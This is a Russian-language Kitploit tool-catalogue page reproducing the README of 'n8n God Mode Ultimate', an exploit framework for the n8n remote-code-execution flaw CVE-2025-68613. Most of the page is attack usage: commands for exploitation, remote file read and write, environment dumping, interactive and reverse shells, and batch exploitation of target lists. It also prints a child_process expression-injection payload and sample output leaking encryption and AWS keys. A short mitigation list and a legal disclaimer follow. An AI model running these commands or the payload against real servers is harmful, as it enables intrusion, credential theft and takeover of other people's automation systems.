Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
n8n-exploit-CVE-2025-68613-n8n-God-Mode-Ultimate — n8n God Mode Ultimate - CVE-2025-68613 Scanner v1.0.0 ║ ║ Удаленное выполнение кода автоматизации рабочих процессов | Kitploit
Инструменты/GitHubGitHub/hackersatyamrastogi/n8n-exploit-cve-2025-68613-n8n-god-mode-ultimate
Сканеры уязвимостейЭксплуатацияЭксплуатация веб-приложенийСбор информацииПост-эксплуатацияТестирование на ПроникновениеКомандование и УправлениеОбучение и ОбразованиеRed Teaming

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться
Инструмент Удаленного Доступа
Разработка Полезной Нагрузки
GitHubhackersatyamrastogi/n8n-exploit-cve-2025-68613-n8n-god-mode-ultimate

n8n-exploit-CVE-2025-68613-n8n-God-Mode-Ultimate

n8n God Mode Ultimate - CVE-2025-68613 Scanner v1.0.0 ║ ║ Удаленное выполнение кода автоматизации рабочих процессов

Репозиторий
537 месяцев назадЕщё не проверено

n8n God Mode Ultimate — CVE-2025-68613 Сканер и фреймворк для эксплуатации

n8n God Mode Ultimate

Продвинутый инструмент для сканирования и эксплуатации RCE в n8n Workflow Automation

Python Version License CVE CVSS Score


🎯 Обзор

n8n God Mode Ultimate — это комплексный фреймворк для тестирования безопасности, предназначенный для обнаружения и проверки CVE-2025-68613 в платформах автоматизации рабочих процессов n8n. Эта критическая уязвимость удаленного выполнения кода (RCE) затрагивает версии n8n через внедрение выражений в контекстах выполнения рабочих процессов.

Детали CVE-2025-68613

  • Оценка CVSS: 10.0 (Критическая)
  • Вектор атаки: Сеть
  • Сложность атаки: Низкая
  • Необходимые привилегии: Низкие (действительные учетные данные)
  • Взаимодействие с пользователем: Не требуется
  • Тип уязвимости: Внедрение выражений → Удаленное выполнение кода

Затронутые версии:

  • n8n >= 0.211.0 и < 1.120.4
  • n8n >= 1.121.0 и < 1.121.1

Исправленные версии:

  • n8n >= 1.120.4
  • n8n >= 1.121.1
  • n8n >= 1.122.0

✨ Возможности

🔍 Обнаружение и сканирование

  • Интеллектуальное определение версии — Извлечение версии n8n из метаданных страницы входа
  • Пакетное сканирование — Многопоточное одновременное сканирование целей с отслеживанием прогресса
  • Несколько режимов сканирования:
    • --detect — Только определение версии (самый быстрый, неинтрузивный)
    • --safe — Безопасная проверка уязвимости без эксплуатации
    • --poc — Проверка концепции RCE
    • --exploit — Полный режим эксплуатации

💣 Возможности эксплуатации

  • 4 метода эксплуатации:
    1. Schedule Trigger — Автоматически выполняемый рабочий процесс (наиболее надежный)
    2. Webhook Trigger — Выполнение по HTTP-триггеру
    3. Code Node — Прямой доступ к child_process
    4. Expression Injection — Ручное выполнение выражений

🎮 Режим «God Mode»

  • Интерактивная оболочка — Полная удаленная оболочка с историей команд
  • Операции с файлами:
    • read <файл> — Чтение удаленных файлов
    • write <файл> <содержимое> — Запись файлов на цель
  • Извлечение окружения — Дамп всех переменных окружения
  • Информация о системе — Детали ОС, конфигурация сети, информация о процессах
  • Обратная оболочка — Опциональная генерация полезной нагрузки reverse shell
  • История команд — Встроенное отслеживание истории

📊 Расширенные возможности

  • Перебор учетных данных — Извлечение сохраненных учетных данных через API
  • Дамп рабочих процессов — Экспорт всех рабочих процессов с метаданными
  • Извлечение конфигурации — Полный дамп системной конфигурации
  • Перебор пользователей — Список всех пользователей n8n
  • Анализ журналов выполнения — Разбор вывода команд из выполнений рабочих процессов
  • Автоматическая очистка — Опциональное удаление рабочих процессов после выполнения

🚀 Установка

Предварительные требования

root@kitploit:~
# Python 3.8 или выше
python3 --version

# Менеджер пакетов pip
pip3 --version

Установка зависимостей

root@kitploit:~
# Клонирование репозитория
git clone https://github.com/hackersatyamrastogi/n8n-exploit-CVE-2025-68613-n8n-God-Mode-Ultimate.git
cd n8n-exploit-CVE-2025-68613-n8n-God-Mode-Ultimate

# Установка необходимых пакетов
pip3 install -r requirements.txt

Зависимости

root@kitploit:~
requests>=2.31.0
urllib3>=2.0.0
tqdm>=4.66.0
colorama>=0.4.6

📖 Использование

Базовое использование

root@kitploit:~
# Показать меню справки
python3 n8n-godmode-ultimate.py -h

# Определить версию n8n (неинтрузивно)
python3 n8n-godmode-ultimate.py -u http://target:5678 --detect

# Безопасная проверка уязвимости
python3 n8n-godmode-ultimate.py -u http://target:5678 --safe -e [email protected] -p password

# Проверка концепции RCE
python3 n8n-godmode-ultimate.py -u http://target:5678 --poc -e [email protected] -p password

# Полная эксплуатация
python3 n8n-godmode-ultimate.py -u http://target:5678 --exploit -e [email protected] -p password

Операции в режиме God Mode

root@kitploit:~
# Выполнить одну команду
python3 n8n-godmode-ultimate.py --god -u http://target:5678 \
  -e [email protected] -p password --cmd "whoami"

# Прочитать удаленный файл
python3 n8n-godmode-ultimate.py --god -u http://target:5678 \
  -e [email protected] -p password --read-file "/etc/passwd"

# Записать удаленный файл
python3 n8n-godmode-ultimate.py --god -u http://target:5678 \
  -e [email protected] -p password --write-file "/tmp/test.txt" --content "payload"

# Извлечь переменные окружения
python3 n8n-godmode-ultimate.py --god -u http://target:5678 \
  -e [email protected] -p password --dump-env

# Интерактивная оболочка
python3 n8n-godmode-ultimate.py --god -u http://target:5678 \
  -e [email protected] -p password --shell

Пакетное сканирование

root@kitploit:~
# Сканирование нескольких целей из файла
python3 n8n-godmode-ultimate.py -l targets.txt --detect -t 20

# Пакетная эксплуатация
python3 n8n-godmode-ultimate.py -l targets.txt --poc -e [email protected] -p password -t 10

Формат targets.txt:

root@kitploit:~
http://target1:5678
https://target2.example.com
http://192.168.1.100:5678
https://n8n.example.org

Команды интерактивной оболочки

В режиме оболочки (--shell):

root@kitploit:~
n8n> whoami              # Выполнить команду
n8n> read /etc/passwd    # Прочитать файл
n8n> env                 # Показать переменные окружения
n8n> info                # Информация о системе
n8n> history             # История команд
n8n> exit                # Выйти из оболочки

🛠️ Параметры командной строки

Параметры цели

root@kitploit:~
-u, --url URL             URL целевого n8n
-l, --list FILE           Файл со списком URL целей
-t, --threads NUM         Количество потоков для пакетного сканирования (по умолчанию: 10)

Аутентификация

root@kitploit:~
-e, --email EMAIL         Email пользователя n8n
-p, --password PASS       Пароль пользователя n8n

Режимы сканирования

root@kitploit:~
--detect                  Только определение версии (самый быстрый)
--safe                    Безопасная проверка без эксплуатации
--poc                     Проверка концепции RCE
--exploit                 Полный режим эксплуатации

God Mode

root@kitploit:~
--god                     Включить god mode
--cmd COMMAND             Выполнить одну команду
--read-file PATH          Прочитать удаленный файл
--write-file PATH         Записать удаленный файл
--content DATA            Содержимое для операции записи
--dump-env                Извлечь все переменные окружения
--shell                   Режим интерактивной оболочки
--revshell HOST:PORT      Полезная нагрузка обратной оболочки

Параметры эксплуатации

root@kitploit:~
--mode MODE               Режим эксплуатации: schedule|webhook|code|expression (по умолчанию: schedule)
--timeout SEC             Тайм-аут команды в секундах (по умолчанию: 30)
--cleanup                 Удалить рабочие процессы после выполнения
-k, --insecure           Отключить проверку SSL
-v, --verbose            Подробный вывод
-q, --quiet              Минимальный вывод

🔬 Технические детали

Методология эксплуатации

1. Schedule Trigger (Рекомендуется)

Создает рабочий процесс с запланированным триггером, который автоматически выполняется каждые 3 секунды. Самый надежный метод.

root@kitploit:~
Payload: {{(function(){
  return this.process.mainModule.require('child_process')
    .execSync('whoami').toString()
})()}}

2. Webhook Trigger

Создает конечную точку HTTP-вебхука, которая выполняет команды при срабатывании.

3. Code Node

Внедряет код непосредственно в узел Code с доступом к child_process.

4. Expression Injection

Ручное выполнение через систему оценки выражений n8n.

Определение версии

Извлекает версию из конфигурации Sentry, закодированной в base64, на странице входа:

root@kitploit:~
<meta name="n8n:config:sentry" content="eyJ2ZXJzaW9uIjoi..." />

Используемые конечные точки API

  • /rest/login — Аутентификация
  • /rest/workflows — Операции CRUD с рабочими процессами
  • /rest/credentials — Перебор учетных данных
  • /rest/executions — Получение журналов выполнения
  • /rest/users — Перебор пользователей
  • /rest/settings — Системная конфигурация

📊 Примеры вывода

Определение версии

root@kitploit:~
[*] n8n God Mode Ultimate v1.0.0
[*] Цель: https://target.example.com
[✓] Версия n8n: 1.36.1
[!] Статус: УЯЗВИМА (< 1.120.4)

Проверка концепции RCE

root@kitploit:~
[*] Аутентификация успешна
[*] Создание эксплуатационного рабочего процесса...
[*] ID рабочего процесса: hd6LxSY765WBThqd
[*] Выполнение команды: whoami
[✓] Команда выполнена успешно!
[+] Вывод: root

Интерактивная оболочка

root@kitploit:~
n8n> whoami
[+] root

n8n> read /etc/hostname
[+] n8n-production-server

n8n> env
[+] Переменные окружения:
N8N_ENCRYPTION_KEY=a1b2c3d4e5f6...
DATABASE_HOST=postgres.internal
AWS_ACCESS_KEY_ID=AKIA...

🛡️ Защитные меры

Немедленные действия

  1. Обновление до исправленной версии (>= 1.120.4 или >= 1.121.1)
  2. Отключение учетных данных по умолчанию ([email protected]:admin)
  3. Внедрение надежной аутентификации (рекомендуется MFA)
  4. Сегментация сети — Ограничение доступа к экземпляру n8n
  5. Аудит рабочих процессов — Проверка всех активных рабочих процессов
  6. Мониторинг журналов выполнения — Проверка на подозрительную активность

Долгосрочное укрепление

  • Включение журналирования аудита
  • Внедрение белых списков IP
  • Использование аутентификации OAuth/SSO
  • Регулярные оценки безопасности
  • Поддержание n8n в актуальном состоянии
  • Шифрование базы данных в состоянии покоя
  • Безопасное хранение учетных данных
  • Мониторинг сетевого трафика

⚠️ Правовое предупреждение

ТОЛЬКО ДЛЯ АВТОРИЗОВАННОГО ТЕСТИРОВАНИЯ БЕЗОПАСНОСТИ

Этот инструмент предоставлен в образовательных целях и для авторизованного тестирования безопасности. Пользователи должны соблюдать все применимые законы и нормативные акты.

⚖️ Правовые требования

ВЫ ОБЯЗАНЫ:

  • ✅ Получить письменное разрешение перед тестированием
  • ✅ Использовать только на системах, которые вам принадлежат или на тестирование которых у вас есть разрешение
  • ✅ Соблюдать практики ответственного раскрытия информации
  • ✅ Соблюдать применимые законы и нормативные акты
  • ✅ Использовать для целей оборонительной безопасности

ВЫ НЕ ДОЛЖНЫ:

  • ❌ Тестировать системы без явного разрешения
  • ❌ Использовать в злонамеренных целях
  • ❌ Выполнять атаки типа «отказ в обслуживании»
  • ❌ Извлекать или изменять данные без авторизации
  • ❌ Развертывать на производственных системах без согласия

📜 Ответственность

Автор НЕ несет ответственности за неправильное использование этого инструмента. Несанкционированный доступ к компьютерным системам является незаконным в соответствии с:

  • Законом о компьютерном мошенничестве и злоупотреблениях (CFAA) — США
  • Законом о компьютерных злоупотреблениях — Великобритания
  • Директивой ЕС по киберпреступности
  • Аналогичным законодательством по всему миру

Используйте на свой страх и риск. Вы несете ответственность за свои действия.


🤝 Участие в разработке

Вклад приветствуется! Пожалуйста, следуйте этим рекомендациям:

  1. Сделайте форк репозитория
  2. Создайте ветку для функции (git checkout -b feature/improvement)
  3. Зафиксируйте свои изменения (git commit -am 'Add new feature')
  4. Отправьте изменения в ветку (git push origin feature/improvement)
  5. Создайте запрос на включение изменений (Pull Request)

Кодекс поведения

  • Следуйте практикам ответственного раскрытия информации
  • Четко документируйте функции безопасности
  • Включайте надлежащую обработку ошибок
  • Добавляйте комментарии для сложной логики
  • Тщательно тестируйте перед отправкой

📚 Ссылки

Информация о CVE

  • CVE-2025-68613 — NVD
  • Уведомления о безопасности n8n

Документация n8n

  • Официальная документация n8n
  • Справочник API n8n
  • Рекомендации по безопасности n8n

Исследования безопасности

  • Уязвимости внедрения выражений
  • Безопасность автоматизации рабочих процессов

👨‍💻 Автор

Satyam Rastogi

  • GitHub: @hackersatyamrastogi
  • Веб-сайт: https://www.satyamrastogi.com
  • Twitter: @hackersatyamrastogi

📄 Лицензия

Этот проект лицензирован в соответствии с лицензией MIT — подробности см. в файле LICENSE.

root@kitploit:~
MIT License

Copyright (c) 2025 Satyam Rastogi

Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:

The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.

THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT.

🌟 Благодарности

  • Команда n8n за создание замечательной платформы автоматизации рабочих процессов
  • Исследователи безопасности в сообществе n8n
  • Инструменты безопасности с открытым исходным кодом, которые вдохновили этот проект

📞 Поддержка

По вопросам безопасности, пожалуйста, сообщайте ответственно:

  • Проблемы безопасности: Открывайте частное уведомление о безопасности
  • Отчеты об ошибках: Используйте GitHub Issues
  • Запросы функций: Открывайте обсуждение на GitHub

⭐ Поставьте звезду этому репозиторию, если вы нашли его полезным!

Сделано 💻 исследователями безопасности для исследователей безопасности

Скачать инструмент